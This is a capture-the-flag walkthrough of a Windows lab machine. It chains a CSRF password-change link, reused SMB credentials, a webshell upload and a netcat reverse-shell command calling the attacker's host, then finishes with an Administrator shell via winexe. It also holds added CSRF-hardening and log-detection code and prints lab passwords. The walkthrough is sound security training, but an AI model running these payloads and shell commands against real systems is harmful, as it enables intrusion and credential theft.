```bash
nmap -p- -sT --min-rate 10000 10.10.10.97 -Pn
```

With the open ports known (80, 445, 8808), let's run a more detailed nmap scan against just those ports.

```bash
nmap -A -sC -sV -p80,445,8808 10.10.10.97 -Pn
```

The application on port 80 presents a login page and a register page.

Let's register an account and log in with it.

```
dr4ks: dr4ks1
```

I enumerate the web application and find little of interest, with one exception: the 'Contact' page can be used for a CSRF (Cross-Site Request Forgery) attack.

Let's try this.

I see that when a message is sent to the 'tyler' user, any link in it is followed automatically.

If I send him a malicious password-change link, his password is reset to a value I know.

Let's enumerate the password change function.

Now I submit the malicious password-change URL through the Contact section. When tyler's client follows it, his password becomes the one I chose; the second URL points at my own host, so a request to it confirms that the links were followed.

```
http://10.10.10.97/change_pass.php?password=password&confirm_password=password&submit=submit
http://10.10.16.8/attackedworkeddr4ks
```
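What makes this work is that the password-change endpoint accepts a plain GET with the new password in the query string, so a link is enough to trigger it. The following is an added example written for this page, not code from the box or the writeup: a minimal Python model of such an endpoint in its vulnerable form beside a hardened form that refuses GET, requires a session-bound CSRF token, and demands the current password. Requests and sessions are plain dicts, the server secret is generated per process, and the victim session and passwords are constructed placeholders.

```python
import hmac
import hashlib
import secrets
from typing import Dict, Tuple

# Constructed example, not the application's code. The secret would be a
# persistent application setting in a real deployment.
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token(session_id: str) -> str:
    """Derive a token bound to the session; a link forged elsewhere cannot carry a valid one."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def change_pass_vulnerable(request: Dict, session: Dict) -> Tuple[int, str]:
    """Model of the behaviour exploited above: any authenticated request, whatever
    its method, changes the password as long as the two fields match."""
    if not session.get("user"):
        return 401, "login required"
    p = request["params"]
    if p.get("password") and p["password"] == p.get("confirm_password"):
        session["password"] = p["password"]
        return 200, "password changed"
    return 400, "passwords do not match"


def change_pass_hardened(request: Dict, session: Dict) -> Tuple[int, str]:
    """Same operation with the three checks that stop the link-based attack."""
    if not session.get("user"):
        return 401, "login required"
    # 1. State changes only on POST: following a bare link cannot trigger one.
    if request["method"] != "POST":
        return 405, "method not allowed"
    p = request["params"]
    # 2. The form must carry the session-bound token, compared in constant time.
    if not hmac.compare_digest(p.get("csrf_token", ""), csrf_token(session["id"])):
        return 403, "missing or invalid csrf token"
    # 3. Re-authenticate: the current password must be supplied.
    if p.get("current_password") != session.get("password"):
        return 403, "current password incorrect"
    if p.get("password") and p["password"] == p.get("confirm_password"):
        session["password"] = p["password"]
        return 200, "password changed"
    return 400, "passwords do not match"


def forged_link_request() -> Dict:
    """The request a victim's client issues when it follows a link like the one
    delivered through the Contact form: a GET with the new password in the query."""
    return {"method": "GET",
            "params": {"password": "password", "confirm_password": "password",
                       "submit": "submit"}}


def new_victim_session() -> Dict:
    # Constructed session; the password is a placeholder, not a real credential.
    return {"id": "sess-victim", "user": "victim", "password": "original-secret"}


def run_demo() -> Dict[str, int]:
    """Exercise both endpoints and return the HTTP status each one produced."""
    v = new_victim_session()
    vulnerable_status = change_pass_vulnerable(forged_link_request(), v)[0]

    h = new_victim_session()
    forged_status = change_pass_hardened(forged_link_request(), h)[0]
    legit = {"method": "POST",
             "params": {"csrf_token": csrf_token(h["id"]),
                        "current_password": "original-secret",
                        "password": "n3w-secret", "confirm_password": "n3w-secret"}}
    legit_status = change_pass_hardened(legit, h)[0]
    return {"vulnerable_forged": vulnerable_status,
            "hardened_forged": forged_status,
            "hardened_legit": legit_status}


if __name__ == "__main__":
    print(run_demo())
```

Running it shows the forged GET succeeding (200) against the vulnerable model and being rejected (405) by the hardened one, while a same-origin POST carrying the token and the current password still succeeds. Any one of the three checks defeats the link in the Contact message; together they also cover a forged POST (rejected with 403 for the missing token) and a session hijack without the current password.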

Yes, the attack worked.

Let's log in to the 'tyler' account with the password 'password'.

Hola, we find his cleartext credentials in a note about the new site.

```
tyler / 92g!mA8BGjOirkL%OG*&
```

I try to access the SMB shares with these credentials, and it works.

```bash
smbmap -H 10.10.10.97 -u tyler -p '92g!mA8BGjOirkL%OG*&'
```

We have WRITE access to the 'new-site' share; anything we upload there is served by the HTTP server on port 8808.

Let's try this.

Let's upload a webshell so we can execute commands.

Let's upload 'nc.exe' to the machine the same way, to get a reverse shell.

Now browse to the uploaded page and pass it the reverse shell command.

```bash
curl "http://10.10.10.97:8808/cmd.php?cmd=nc.exe+-e+cmd.exe+10.10.16.8+1337"
```
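Both steps that gave a foothold here leave a distinctive trace in the web server's access log: a password change carried in a GET query string, and requests to a freshly uploaded script whose parameter values name shell binaries. The following is an added detection example written for this page, not part of the original writeup: it parses combined-format access log lines and flags both patterns. The log lines, the client IP and the parameter and indicator lists are constructed for the example; the detector is generic and not tied to this application.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Constructed sample log in combined format; these are not the box's real logs.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2024:10:00:09 +0000] "GET /change_pass.php?password=password&confirm_password=password&submit=submit HTTP/1.1" 302 0 "http://10.10.10.97/contact.php" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2024:10:01:00 +0000] "GET /cmd.php?cmd=whoami HTTP/1.1" 200 34 "-" "curl/7.68.0"
10.10.14.5 - - [01/Jan/2024:10:01:20 +0000] "GET /cmd.php?cmd=nc.exe+-e+cmd.exe+10.10.14.5+1337 HTTP/1.1" 200 0 "-" "curl/7.68.0"
10.10.14.5 - - [01/Jan/2024:10:02:00 +0000] "POST /login.php HTTP/1.1" 302 0 "http://10.10.10.97/login.php" "Mozilla/5.0"
"""

# Combined log format: ip ident user [timestamp] "METHOD target proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')

# Parameter names that should never travel in a GET query string.
SENSITIVE_PARAMS = {"password", "confirm_password", "new_password", "passwd", "pass"}
# Parameter names typical of command-execution scripts.
COMMAND_PARAMS = {"cmd", "exec", "command", "c"}
# Values that name shell interpreters or relay binaries (case-insensitive).
SHELL_INDICATORS = re.compile(r"\b(cmd\.exe|nc\.exe|powershell|/bin/sh|bash)\b", re.I)

REASON_CRED_IN_GET = "credential-bearing parameter in a GET query string"
REASON_CMD_PARAM = "command-style parameter name"
REASON_SHELL_VALUE = "shell or binary indicator in a parameter value"


def analyze(log_text: str) -> List[Dict]:
    """Return one finding per suspicious request; unparseable lines are skipped."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # parse_qs decodes '+' and percent-escapes, so "nc.exe+-e" becomes "nc.exe -e".
        params = parse_qs(parts.query, keep_blank_values=True)
        reasons = []
        if m.group("method") == "GET" and SENSITIVE_PARAMS & set(params):
            reasons.append(REASON_CRED_IN_GET)
        if COMMAND_PARAMS & set(params):
            reasons.append(REASON_CMD_PARAM)
        joined_values = " ".join(v for values in params.values() for v in values)
        if SHELL_INDICATORS.search(joined_values):
            reasons.append(REASON_SHELL_VALUE)
        if reasons:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "path": parts.path, "status": int(m.group("status")),
                             "referer": m.group("referer"), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["path"], f["status"], "; ".join(f["reasons"]))
```

On the sample it flags three of the five lines: the GET to change_pass.php for carrying a password, the first cmd.php request for its command-style parameter, and the second for both the parameter name and the nc.exe and cmd.exe in its value. The referer is kept in each finding because, for the password-change case, a referer pointing at a page other than the change-password form itself is the quickest way to tell a forged request from a user's own.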

user.txt

I find credentials here.

```
secnotes: q8N#9Eos%JinE57tke72
root: qwer1234QWER!@#$
```

Enumerating further, I find a 'bash.lnk' file on tyler's Desktop.

I switch to PowerShell.

Simply running bash.exe from PowerShell gives me a 'root' shell on the Linux side.

As the image shows, the 'Administrator' credentials are sitting in the .bash_history file.

```
administrator%u6!4ZwgwOM#^OBf#Nwnh
```

I use the winexe tool to get a shell on the machine with Administrator privileges.

```bash
winexe -U '.\administrator%u6!4ZwgwOM#^OBf#Nwnh' //10.10.10.97 cmd.exe
```

root.txt
